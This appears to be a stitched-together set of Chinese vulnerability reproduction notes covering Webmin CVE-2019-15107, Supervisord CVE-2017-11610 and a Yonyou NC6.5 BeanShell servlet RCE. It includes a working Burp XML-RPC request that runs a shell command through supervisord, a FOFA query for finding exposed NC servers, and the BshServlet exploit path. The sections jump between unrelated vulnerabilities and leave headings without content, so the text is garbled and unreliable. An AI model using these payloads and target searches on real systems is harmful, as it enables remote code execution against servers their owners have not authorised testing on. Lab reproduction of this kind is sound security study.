- 1/ 漏洞简述
- 2/ 影响面简述
- 3/复现截图


- 4/ 原理简述
- 5/ 修复建议
— 自动化运维 Leaning—
POC & EXP
Webmin 被爆出1.920版本之前存在一个远程命令执行漏洞(CVE-2019-15107),当用户开 Webmin 密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统 Shell。由于Webmin 中 Password_Change.cgi 在接收请求的处理过程中,old 参数存在命令注入漏洞,可被攻击者恶意利用。
Webmin 1.920及以下版本。
1、首先打开靶场。
2、利用 POC 进行验证,发现有回显。
3、直接查看 Flag。
实验环境和介绍
Supervisord 远程代码执行漏洞_视频教程_i春秋_培育信息时代的安全感! (ichunqiu.com)
参考
https://blogs.securiteam.com/index.php/archives/3348
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
burp
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
0x02 影响版本
NC6.5版本
0x03 漏洞复现
FOFA语句:
icon_hash="1085941792"
执行命令
PoC:
/servlet/~ic/bsh.servlet.BshServlet